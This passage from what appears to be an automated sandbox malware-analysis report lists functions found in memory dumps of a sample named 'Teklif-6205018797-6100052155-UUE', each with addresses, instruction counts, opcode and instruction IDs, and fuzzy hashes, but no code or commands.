                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 46f4c50e33e49b35d88a55304a5f1ba20ec7b3b4e1ef5028ea59ccc23fd1ebd8
                                                          • Instruction ID: c6d88a93b869ec139c849bfbc4cefc2f0f43b48a1374b852c9fde30adc9b7b8b
                                                          • Opcode Fuzzy Hash: 46f4c50e33e49b35d88a55304a5f1ba20ec7b3b4e1ef5028ea59ccc23fd1ebd8
                                                          • Instruction Fuzzy Hash: A7C08C70083A04DBC35C3FE8B90E7383BA8BF00302F902830E50C000A28A754470DFA7
                                                          Function 05855B90 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3bd86e436c2baba4ed4108d5b630c1e99fa51300b78939fc6a207b2eb556a66e
                                                          • Instruction ID: a5884379f15c402df8062e9b185897d63b67c08bc3dc4424dfcc2350fe38b239
                                                          • Opcode Fuzzy Hash: 3bd86e436c2baba4ed4108d5b630c1e99fa51300b78939fc6a207b2eb556a66e
                                                          • Instruction Fuzzy Hash: D8D04274A0031CAFDB54DF64E84875977B2EF4A324F508195984DA2314DB701D98CF01
                                                          Function 05930CD0 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 022e50fbf6fa151080fb8c4b92406b95bb961e031b341f7c2e7f8392a45845a9
                                                          • Instruction ID: f5ee4c6dee1b597493f860fd20951d92d3f52d07b76d9a8c2fea8cac49a1480a
                                                          • Opcode Fuzzy Hash: 022e50fbf6fa151080fb8c4b92406b95bb961e031b341f7c2e7f8392a45845a9
                                                          • Instruction Fuzzy Hash: 10C09BB26C41565BFF4591859D067CC1781D3507A5F0B8210A100DF9C3D54CD0474040
                                                          Function 059337D1 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c29d1c75e431dc1cafc6b8f0fea1d42b92ec24f64a5f93e62f69cafdc7590469
                                                          • Instruction ID: 977da2d1f8150226f76eea768a527cbcde181d28103c2dcb2419633e12b089bb
                                                          • Opcode Fuzzy Hash: c29d1c75e431dc1cafc6b8f0fea1d42b92ec24f64a5f93e62f69cafdc7590469
                                                          • Instruction Fuzzy Hash: 24C04C325461146FF7054EA5CE4770DBA62FFA0764F0585296241C7A65C7389812D545
                                                          Function 058566F3 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ad7cbf7c87ec1c3969fe6c353af77436eecf84b161079ec877eda478c68884f
                                                          • Instruction ID: fc0a37d66e711b92a7e0ef12a8bcdfd9c397f2f67e7e374a227797a584d6e7c0
                                                          • Opcode Fuzzy Hash: 5ad7cbf7c87ec1c3969fe6c353af77436eecf84b161079ec877eda478c68884f
                                                          • Instruction Fuzzy Hash: 94C00276E5001A9A8B00DAD9E4508DCB774EB94321B004066E224A6104D63015268B50
                                                          Function 0593CC70 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

                                                          Non-executed Functions

                                                          Function 05933348 Relevance: 2.8, Strings: 2, Instructions: 336COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$,aq
                                                          • API String ID: 0-1929014441
                                                          • Opcode ID: f9cee9fe867e2472e03a60a7edd024a19b408f9d0080fb4992d8af8936e33a6c
                                                          • Instruction ID: 42ff7ae020f34dae5085665f2911cafbcd75b9dcd43db7dcc6ba64bea17a6871
                                                          • Opcode Fuzzy Hash: f9cee9fe867e2472e03a60a7edd024a19b408f9d0080fb4992d8af8936e33a6c
                                                          • Instruction Fuzzy Hash: 40D11834A40205DFCB15DF69C589A6EBBF6BF88315F29C8A9E406AB361C735EC41CB50
                                                          Function 00796791 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: c7758190f40c62b51d625629bedb4a335c1feabe26fbfd90c6a8e2fd6f0ac369
                                                          • Instruction ID: 95d75b364874ae584451201f4305457635c9cecf04dacae058bcdc8c5b5d8313
                                                          • Opcode Fuzzy Hash: c7758190f40c62b51d625629bedb4a335c1feabe26fbfd90c6a8e2fd6f0ac369
                                                          • Instruction Fuzzy Hash: 10711CB0A016058FDB48EF6AE94469ABBF7FFC5300F18D269D004AB279DF345946CB90
                                                          Function 007967A0 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 47c6fcf79d8c806b0b1bbdaa33dc17ac4fdb436ac3a3a6e40790b200310bfbb6
                                                          • Instruction ID: 33af96d995e3ea7473f25f925539460bc61f4f13e98e3057bde81491a10e6fb4
                                                          • Opcode Fuzzy Hash: 47c6fcf79d8c806b0b1bbdaa33dc17ac4fdb436ac3a3a6e40790b200310bfbb6
                                                          • Instruction Fuzzy Hash: 4771FCB0A016058FDB48EF6AE94469ABBF7FFC5300F18D569D004AB279DF345946CB90
                                                          Function 05850040 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: >$_
                                                          • API String ID: 0-3683171403
                                                          • Opcode ID: ce63065a52b46a8b8f25bec93be14006a76c3328c3b3d5bca41f0d2c9c7dc2b9
                                                          • Instruction ID: 3b21638521385236cbdbc1ee326646ef7902641199bf0113c0b0213bd5edcc29
                                                          • Opcode Fuzzy Hash: ce63065a52b46a8b8f25bec93be14006a76c3328c3b3d5bca41f0d2c9c7dc2b9
                                                          • Instruction Fuzzy Hash: 20319D71E056188BDB58DF6BCC4969AFBF7AFC8310F14C1BA980CA6214DB340A81CF51
                                                          Function 05855328 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RZW+
                                                          • API String ID: 0-2016248192
                                                          • Opcode ID: 392cf5b20ba7a0d04460a3e318ad96e537dce44a2d54e796e68563c8ca2d5490
                                                          • Instruction ID: 961f3a76f39ca0c6774eece8f5cae2b7d173e629a6bc1545281918e71174d5f7
                                                          • Opcode Fuzzy Hash: 392cf5b20ba7a0d04460a3e318ad96e537dce44a2d54e796e68563c8ca2d5490
                                                          • Instruction Fuzzy Hash: B512B570E056189FDB14CFAAC98069DFBF2BF88314F24C169D819EB219D734A946CF50
                                                          Function 0585F988 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: a56195b363f0940d1495dc208db242653bbd466eaf1cf974c59e7e92c7b96e2d
                                                          • Instruction ID: a5e619a053b88caeff9236e294a6402d0451dc70023faf8d34b8287f2bad7585
                                                          • Opcode Fuzzy Hash: a56195b363f0940d1495dc208db242653bbd466eaf1cf974c59e7e92c7b96e2d
                                                          • Instruction Fuzzy Hash: 99B1E5B0E45218CFEB14CFA9D884BADBBF2BB49314F2080AAD909EB255D7745D85CF05
                                                          Function 059855D8 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: daq
                                                          • API String ID: 0-1532007458
                                                          • Opcode ID: 7a6e1afba7e027110c92d2c62eb4f3cd3b3627bae62559df4e5e85bfcc2fb00c
                                                          • Instruction ID: 6d2839b0d1e2fb23f8a948b7b17299728bcb1cfacda1e88fe5295163f26acc69
                                                          • Opcode Fuzzy Hash: 7a6e1afba7e027110c92d2c62eb4f3cd3b3627bae62559df4e5e85bfcc2fb00c
                                                          • Instruction Fuzzy Hash: 1F812274D05218DFCB14EFA8D888BEDBBF2FB49304F218469E409AB285DB755989CF11
                                                          Function 059855E8 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: daq
                                                          • API String ID: 0-1532007458
                                                          • Opcode ID: aa10785b3dda13938ec9b04ca996794b2ca686788b4a719dff0ee944824223b2
                                                          • Instruction ID: 5af644432482e7c900fe5368d2c0d29ea58693ac71c33a35adcd4b39534e4a09
                                                          • Opcode Fuzzy Hash: aa10785b3dda13938ec9b04ca996794b2ca686788b4a719dff0ee944824223b2
                                                          • Instruction Fuzzy Hash: 8B813274D05218DFCB14EFA8D888BEDBBF2FB49304F218469E409A7285DB755989CF11
                                                          Function 05850007 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: _
                                                          • API String ID: 0-701932520
                                                          • Opcode ID: b3255a7dd60979e82b24e0bd24f605fcfc788aad9ee2bf31d2cfddc171ad5ef4
                                                          • Instruction ID: f5003f0902b0eb2cc8875010c66c2b02cd6d4bcabe9255d35d75d56ea4c306a2
                                                          • Opcode Fuzzy Hash: b3255a7dd60979e82b24e0bd24f605fcfc788aad9ee2bf31d2cfddc171ad5ef4
                                                          • Instruction Fuzzy Hash: 3731D471D056598FEB19CF6B8C45299BFF3AFC5310F18C1FA984CAA265DA340A85CF11
                                                          Function 0596E800 Relevance: .3, Instructions: 256COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 140a6c919ed3cb5ef6d07c6c87c1f3abf36dc98a20e245c5a91fdc275991ad44
                                                          • Instruction ID: 8ce8799015cbde175512b111a361cc2bcb7f76bce73e4214977be770af02cff0
                                                          • Opcode Fuzzy Hash: 140a6c919ed3cb5ef6d07c6c87c1f3abf36dc98a20e245c5a91fdc275991ad44
                                                          • Instruction Fuzzy Hash: 58B14A78E05208CFDB54DFA9D484BAEBBFAFB49304F1480A9D40ABB255DB745988CF14
                                                          Function 0596E810 Relevance: .3, Instructions: 253COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0074692a1785819bc0a37a947d19eefb37fd828c8e609f7a13d77ab2372c55b4
                                                          • Instruction ID: ead81ddf6a96719eca99d03ef629dbaded16226bc61563fd9c670c364b91e314
                                                          • Opcode Fuzzy Hash: 0074692a1785819bc0a37a947d19eefb37fd828c8e609f7a13d77ab2372c55b4
                                                          • Instruction Fuzzy Hash: ADB14A78E05208CFDB14DFA5D484BAEBBFAFB4A304F1480A9D41ABB255DB745988CF14
                                                          Function 05967D78 Relevance: .2, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be1b451c1227104d06e3bbb56b92d8af5b76869b853cadcdf2a197251b6a0880
                                                          • Instruction ID: 338c06f4c8814987ccaefddf35df6d581ca0556ea34997804ccd82b90827b515
                                                          • Opcode Fuzzy Hash: be1b451c1227104d06e3bbb56b92d8af5b76869b853cadcdf2a197251b6a0880
                                                          • Instruction Fuzzy Hash: E9A1F470D45218DFDB14CFA9D844BEDBBF2FB49304F24956AD409AB265DB70988ACF00
                                                          Function 05967D6A Relevance: .2, Instructions: 233COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbcfc967904001ecc97c1ed65cb9c71c043e29ec87cf6b67ef89f57acc97e07d
                                                          • Instruction ID: 7d15900fb28f39623c5efdc594adc284a4b62e958959be2fd5a637f50c38ed93
                                                          • Opcode Fuzzy Hash: dbcfc967904001ecc97c1ed65cb9c71c043e29ec87cf6b67ef89f57acc97e07d
                                                          • Instruction Fuzzy Hash: 87A10570D05218DFDB54CFA9D844BADBBF2FB49304F24856AD409BB265DB70998ACF04
                                                          Function 0596EDC0 Relevance: .2, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 183ecd1d9b39b2a30a04117a1854f5ff51e6fcb13823aa139d9a80c266ea6045
                                                          • Instruction ID: 35a85b56e5b12304a232559156880e2b3bd0c6797abdbd4d9f020d63459f7a2a
                                                          • Opcode Fuzzy Hash: 183ecd1d9b39b2a30a04117a1854f5ff51e6fcb13823aa139d9a80c266ea6045
                                                          • Instruction Fuzzy Hash: CD811B78D05208CFDB04DFA8D444BEEBBFAFB49304F24846AE409AB255DB749959CF05
                                                          Function 0596EDD0 Relevance: .2, Instructions: 204COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3f71b83dbb49bd6465d9477151f13ab699be63c0b3dc8553474f6b8b63ba5678
                                                          • Instruction ID: 00eccce95dfc4d67449d58d5474fa333610646809be32351c022f891c1ada654
                                                          • Opcode Fuzzy Hash: 3f71b83dbb49bd6465d9477151f13ab699be63c0b3dc8553474f6b8b63ba5678
                                                          • Instruction Fuzzy Hash: 21812A78D05208CFDB04DFA8D444BEEBBFAFB49304F24946AE409AB295DB749959CF04
                                                          Function 05962540 Relevance: .2, Instructions: 197COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c367947b93d4f73e134f1c08badab3933331bcd7a48653dbfc0502dc763cb1f2
                                                          • Instruction ID: 9595d83bcbb8e5a2a38d2581887e620c5f00c3b2d4701667547c180dc1357799
                                                          • Opcode Fuzzy Hash: c367947b93d4f73e134f1c08badab3933331bcd7a48653dbfc0502dc763cb1f2
                                                          • Instruction Fuzzy Hash: 53814A74E04208CFDB14DF68D494BADBBF6FB4A304F2490AAE409EB255DB749989CF05
                                                          Function 05C8D168 Relevance: .2, Instructions: 196COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 273754886f503b885c023c3bf332e011dcc17b2853e892ab7feaa8a28489a0cc
                                                          • Instruction ID: dc02e23e06d57b715f5e67d9dd44e5bfe46994f509869385ec403231053128c0
                                                          • Opcode Fuzzy Hash: 273754886f503b885c023c3bf332e011dcc17b2853e892ab7feaa8a28489a0cc
                                                          • Instruction Fuzzy Hash: 4E811A74E04318CFDB24EF66D844BADBBB6FF49318F1098A9D40AA7290DB745985CF41
                                                          Function 05C70040 Relevance: .2, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f071c3b385da2c395737e05e9335a82f9823b6ea5142901b1b1a78f2b089e940
                                                          • Instruction ID: 963e68257031ea03e5999c4f549692faa9e05c6b48208c77d4da366e2dd43541
                                                          • Opcode Fuzzy Hash: f071c3b385da2c395737e05e9335a82f9823b6ea5142901b1b1a78f2b089e940
                                                          • Instruction Fuzzy Hash: 0571D570D4022E8FDB68DF26C848BEABBF2AB48304F1085EAD41DA7645DB745AC5CF51
                                                          Function 05986130 Relevance: .1, Instructions: 137COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9004fdcb443132b62fcf15140d059dbef860bc9080775abebee8d6308ea2458f
                                                          • Instruction ID: 738cdcc6d75910d966605f0ef9c6736c31b06235a9ab146974a4828e53a59de9
                                                          • Opcode Fuzzy Hash: 9004fdcb443132b62fcf15140d059dbef860bc9080775abebee8d6308ea2458f
                                                          • Instruction Fuzzy Hash: 16515770E05208CFDB14EFA8E544BEDBBF2FB9A300F24806AD409AB255C7346955CF04
                                                          Function 05986140 Relevance: .1, Instructions: 137COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 414a5131c531ad25e566fed544f056699e702cba214cc502b4c46736afeb1bef
                                                          • Instruction ID: bdd12dde759156466c022f6d503ddeaa80222e5fc460cc358f7cbd175077adee
                                                          • Opcode Fuzzy Hash: 414a5131c531ad25e566fed544f056699e702cba214cc502b4c46736afeb1bef
                                                          • Instruction Fuzzy Hash: 34514470E05208CFDB14EFA8E544BFDBBF6EB9A300F20946AE409AB255CB346955CF04
                                                          Function 05A00006 Relevance: .1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232473759.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5a00000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ce9e1441798a7db915866b32c38d6bf2c214da0345b52384aba836978c1d05c
                                                          • Instruction ID: 1c95416da6507802f4a6f4ea40a382943bb672e8069abbd8ae1c3074267a07ca
                                                          • Opcode Fuzzy Hash: 3ce9e1441798a7db915866b32c38d6bf2c214da0345b52384aba836978c1d05c
                                                          • Instruction Fuzzy Hash: F0516071D056588BE729CF2B8D546DAFBF3AFC9300F48C1FA944CAA265DA7405868F41
                                                          Function 05855318 Relevance: .1, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b73b60ec7ef7236bbc64f094bd57b960c6239a96ca1e87c5b913a9defe84a61
                                                          • Instruction ID: 1d2cabce897ff393a56779a662d5eb7f8581f28d63d41389a387fb47566278b9
                                                          • Opcode Fuzzy Hash: 0b73b60ec7ef7236bbc64f094bd57b960c6239a96ca1e87c5b913a9defe84a61
                                                          • Instruction Fuzzy Hash: 5C4156B1E016198BDB18CFABD94059EFBF3AFC8310F14C07AD958AB264DA3459468F54
                                                          Function 05A00040 Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232473759.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5a00000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23c80a7ba8b39421bd9d558daa36598a4dc061d3182c2b0a6a805cf913643034
                                                          • Instruction ID: ce105124138009df00ee5be634d13c740a1e74cd8476b9233a068a8f89bf1bb3
                                                          • Opcode Fuzzy Hash: 23c80a7ba8b39421bd9d558daa36598a4dc061d3182c2b0a6a805cf913643034
                                                          • Instruction Fuzzy Hash: 9D511BB1D056588BEB68CF2B8D446DAFAF3AFC9300F54C1FA984CA6254DB700AC58F51
                                                          Function 05A0D3E0 Relevance: .1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232473759.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5a00000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dafba9d6751dfff4052241e393a562ee18051950ccaf86ba160ac5824b50402c
                                                          • Instruction ID: 69aaaeeb01561445a0c88b4cce4ba89cbf02dafd734b8e703ed39be4c6fe6542
                                                          • Opcode Fuzzy Hash: dafba9d6751dfff4052241e393a562ee18051950ccaf86ba160ac5824b50402c
                                                          • Instruction Fuzzy Hash: C041E0B5D142489FDB14CFE9D884BADFBF1BB09304F209029E829BB290D775A885CF45
                                                          Function 05856D19 Relevance: .1, Instructions: 108COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 708f1090824965ce9497f032ec259ffcc9426f65ab0589379f09cb9228703e77
                                                          • Instruction ID: ceb9a9ec1a6f570ba05decb84215e7ff4fbe7b70f0eaf0a4b378d70ec2f7510d
                                                          • Opcode Fuzzy Hash: 708f1090824965ce9497f032ec259ffcc9426f65ab0589379f09cb9228703e77
                                                          • Instruction Fuzzy Hash: 7D415D71E05A588BEB58CF6BCC4469AFBF3BFC9311F54D1B99848AA255EB3009428F01
                                                          Function 05960578 Relevance: .1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
